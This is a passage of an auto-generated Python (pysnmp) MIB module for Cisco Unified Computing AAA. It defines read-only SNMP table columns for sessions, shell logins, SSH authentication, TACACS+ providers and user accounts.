cucsAaaSessionLRId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRId.setStatus('current')
cucsAaaSessionLRInd = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 11), CucsConditionActionIndicator()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRInd.setStatus('current')
cucsAaaSessionLRSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 12), CucsConditionSeverity()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRSeverity.setStatus('current')
cucsAaaSessionLRTrig = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 13), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRTrig.setStatus('current')
cucsAaaSessionLRTxId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 14), Unsigned64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRTxId.setStatus('current')
cucsAaaSessionLRUser = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 15), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRUser.setStatus('current')
cucsAaaSessionLRSessionId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRSessionId.setStatus('current')
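# cucsAaaShellLoginTable -- AaaShellLogin managed objects (1.3.6.1.4.1.9.9.719.1.2.28); rows indexed by cucsAaaShellLoginInstanceId.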
cucsAaaShellLoginTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28), )
if mibBuilder.loadTexts: cucsAaaShellLoginTable.setStatus('current')
cucsAaaShellLoginEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaShellLoginInstanceId"))
if mibBuilder.loadTexts: cucsAaaShellLoginEntry.setStatus('current')
cucsAaaShellLoginInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaShellLoginInstanceId.setStatus('current')
cucsAaaShellLoginDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginDn.setStatus('current')
cucsAaaShellLoginRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginRn.setStatus('current')
cucsAaaShellLoginDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginDescr.setStatus('current')
cucsAaaShellLoginId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginId.setStatus('current')
cucsAaaShellLoginIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginIntId.setStatus('current')
cucsAaaShellLoginLocalHost = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginLocalHost.setStatus('current')
cucsAaaShellLoginName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginName.setStatus('current')
cucsAaaShellLoginRemoteHost = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginRemoteHost.setStatus('current')
cucsAaaShellLoginSession = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 10), CucsAaaSession()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginSession.setStatus('current')
cucsAaaShellLoginSwitchId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 11), CucsNetworkSwitchId()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginSwitchId.setStatus('current')
cucsAaaShellLoginPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 12), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginPolicyLevel.setStatus('current')
cucsAaaShellLoginPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 13), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginPolicyOwner.setStatus('current')
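# cucsAaaSshAuthTable -- AaaSshAuth managed objects (1.3.6.1.4.1.9.9.719.1.2.29); rows indexed by cucsAaaSshAuthInstanceId.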
cucsAaaSshAuthTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 29), )
if mibBuilder.loadTexts: cucsAaaSshAuthTable.setStatus('current')
cucsAaaSshAuthEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 29, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaSshAuthInstanceId"))
if mibBuilder.loadTexts: cucsAaaSshAuthEntry.setStatus('current')
cucsAaaSshAuthInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 29, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaSshAuthInstanceId.setStatus('current')
cucsAaaSshAuthDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 29, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSshAuthDn.setStatus('current')
cucsAaaSshAuthRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 29, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSshAuthRn.setStatus('current')
cucsAaaSshAuthData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 29, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSshAuthData.setStatus('current')
cucsAaaSshAuthOldStrType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 29, 1, 5), CucsAaaSshStr()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSshAuthOldStrType.setStatus('current')
cucsAaaSshAuthStrType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 29, 1, 6), CucsAaaSshStr()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSshAuthStrType.setStatus('current')
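# cucsAaaTacacsPlusEpTable -- AaaTacacsPlusEp (TACACS+ endpoint) managed objects (1.3.6.1.4.1.9.9.719.1.2.30); rows indexed by cucsAaaTacacsPlusEpInstanceId.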
cucsAaaTacacsPlusEpTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30), )
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpTable.setStatus('current')
cucsAaaTacacsPlusEpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaTacacsPlusEpInstanceId"))
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpEntry.setStatus('current')
cucsAaaTacacsPlusEpInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpInstanceId.setStatus('current')
cucsAaaTacacsPlusEpDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpDn.setStatus('current')
cucsAaaTacacsPlusEpRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpRn.setStatus('current')
cucsAaaTacacsPlusEpDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpDescr.setStatus('current')
cucsAaaTacacsPlusEpFsmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmDescr.setStatus('current')
cucsAaaTacacsPlusEpFsmPrev = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmPrev.setStatus('current')
cucsAaaTacacsPlusEpFsmProgr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmProgr.setStatus('current')
cucsAaaTacacsPlusEpFsmRmtInvErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmRmtInvErrCode.setStatus('current')
cucsAaaTacacsPlusEpFsmRmtInvErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmRmtInvErrDescr.setStatus('current')
cucsAaaTacacsPlusEpFsmRmtInvRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 10), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmRmtInvRslt.setStatus('current')
cucsAaaTacacsPlusEpFsmStageDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 11), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageDescr.setStatus('current')
cucsAaaTacacsPlusEpFsmStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 12), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStamp.setStatus('current')
cucsAaaTacacsPlusEpFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 13), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStatus.setStatus('current')
cucsAaaTacacsPlusEpFsmTry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 14), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmTry.setStatus('current')
cucsAaaTacacsPlusEpIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 15), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpIntId.setStatus('current')
cucsAaaTacacsPlusEpName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpName.setStatus('current')
cucsAaaTacacsPlusEpRetries = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 17), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpRetries.setStatus('current')
cucsAaaTacacsPlusEpTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 18), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpTimeout.setStatus('current')
cucsAaaTacacsPlusEpPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 19), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpPolicyLevel.setStatus('current')
cucsAaaTacacsPlusEpPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 20), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpPolicyOwner.setStatus('current')
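# cucsAaaTacacsPlusEpFsmTable -- AaaTacacsPlusEpFsm managed objects (1.3.6.1.4.1.9.9.719.1.2.51); rows indexed by cucsAaaTacacsPlusEpFsmInstanceId.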
cucsAaaTacacsPlusEpFsmTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51), )
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmTable.setStatus('current')
cucsAaaTacacsPlusEpFsmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaTacacsPlusEpFsmInstanceId"))
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmEntry.setStatus('current')
cucsAaaTacacsPlusEpFsmInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmInstanceId.setStatus('current')
cucsAaaTacacsPlusEpFsmDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmDn.setStatus('current')
cucsAaaTacacsPlusEpFsmRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmRn.setStatus('current')
cucsAaaTacacsPlusEpFsmCompletionTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 4), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmCompletionTime.setStatus('current')
cucsAaaTacacsPlusEpFsmCurrentFsm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 5), CucsAaaTacacsPlusEpFsmCurrentFsm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmCurrentFsm.setStatus('current')
cucsAaaTacacsPlusEpFsmDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmDescrData.setStatus('current')
cucsAaaTacacsPlusEpFsmFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 7), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmFsmStatus.setStatus('current')
cucsAaaTacacsPlusEpFsmProgress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmProgress.setStatus('current')
cucsAaaTacacsPlusEpFsmRmtErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmRmtErrCode.setStatus('current')
cucsAaaTacacsPlusEpFsmRmtErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmRmtErrDescr.setStatus('current')
cucsAaaTacacsPlusEpFsmRmtRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 11), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmRmtRslt.setStatus('current')
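# cucsAaaTacacsPlusEpFsmStageTable -- AaaTacacsPlusEpFsmStage managed objects (1.3.6.1.4.1.9.9.719.1.2.52); rows indexed by cucsAaaTacacsPlusEpFsmStageInstanceId.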
cucsAaaTacacsPlusEpFsmStageTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52), )
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageTable.setStatus('current')
cucsAaaTacacsPlusEpFsmStageEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaTacacsPlusEpFsmStageInstanceId"))
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageEntry.setStatus('current')
cucsAaaTacacsPlusEpFsmStageInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageInstanceId.setStatus('current')
cucsAaaTacacsPlusEpFsmStageDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageDn.setStatus('current')
cucsAaaTacacsPlusEpFsmStageRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageRn.setStatus('current')
cucsAaaTacacsPlusEpFsmStageDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageDescrData.setStatus('current')
cucsAaaTacacsPlusEpFsmStageLastUpdateTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 5), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageLastUpdateTime.setStatus('current')
cucsAaaTacacsPlusEpFsmStageName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 6), CucsAaaTacacsPlusEpFsmStageName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageName.setStatus('current')
cucsAaaTacacsPlusEpFsmStageOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageOrder.setStatus('current')
cucsAaaTacacsPlusEpFsmStageRetry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageRetry.setStatus('current')
cucsAaaTacacsPlusEpFsmStageStageStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 9), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageStageStatus.setStatus('current')
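# cucsAaaTacacsPlusProviderTable -- AaaTacacsPlusProvider managed objects (1.3.6.1.4.1.9.9.719.1.2.31); rows indexed by cucsAaaTacacsPlusProviderInstanceId.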
cucsAaaTacacsPlusProviderTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31), )
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderTable.setStatus('current')
cucsAaaTacacsPlusProviderEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaTacacsPlusProviderInstanceId"))
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderEntry.setStatus('current')
cucsAaaTacacsPlusProviderInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderInstanceId.setStatus('current')
cucsAaaTacacsPlusProviderDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderDn.setStatus('current')
cucsAaaTacacsPlusProviderRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderRn.setStatus('current')
cucsAaaTacacsPlusProviderDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderDescr.setStatus('current')
cucsAaaTacacsPlusProviderEncKey = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderEncKey.setStatus('current')
cucsAaaTacacsPlusProviderKey = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderKey.setStatus('current')
cucsAaaTacacsPlusProviderKeySet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 8), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderKeySet.setStatus('current')
cucsAaaTacacsPlusProviderName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderName.setStatus('current')
cucsAaaTacacsPlusProviderOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderOrder.setStatus('current')
cucsAaaTacacsPlusProviderPort = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 11), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderPort.setStatus('current')
cucsAaaTacacsPlusProviderRetries = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 12), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderRetries.setStatus('current')
cucsAaaTacacsPlusProviderTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 13), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderTimeout.setStatus('current')
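# cucsAaaUserTable -- AaaUser managed objects (1.3.6.1.4.1.9.9.719.1.2.32); rows indexed by cucsAaaUserInstanceId.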
cucsAaaUserTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32), )
if mibBuilder.loadTexts: cucsAaaUserTable.setStatus('current')
cucsAaaUserEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaUserInstanceId"))
if mibBuilder.loadTexts: cucsAaaUserEntry.setStatus('current')
cucsAaaUserInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaUserInstanceId.setStatus('current')
cucsAaaUserDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDn.setStatus('current')
cucsAaaUserRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserRn.setStatus('current')
cucsAaaUserDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDescr.setStatus('current')
cucsAaaUserEmail = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEmail.setStatus('current')
cucsAaaUserEncPwd = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEncPwd.setStatus('current')
cucsAaaUserExpiration = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 7), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserExpiration.setStatus('current')
cucsAaaUserExpires = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 8), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserExpires.setStatus('current')
cucsAaaUserFirstName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserFirstName.setStatus('current')
cucsAaaUserLastName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 11), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserLastName.setStatus('current')
cucsAaaUserName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 12), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserName.setStatus('current')
cucsAaaUserPhone = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 13), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserPhone.setStatus('current')
cucsAaaUserPriv = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 14), CucsAaaAccess()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserPriv.setStatus('current')
cucsAaaUserPwd = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 15), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserPwd.setStatus('current')
cucsAaaUserPwdSet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 16), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserPwdSet.setStatus('current')
cucsAaaUserAccountStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 17), CucsAaaAccountStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserAccountStatus.setStatus('current')
cucsAaaUserClearPwdHistory = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 18), CucsAaaClear()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserClearPwdHistory.setStatus('current')
cucsAaaUserPwdLifeTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 19), Gauge32()).setMaxAccess("readonly")
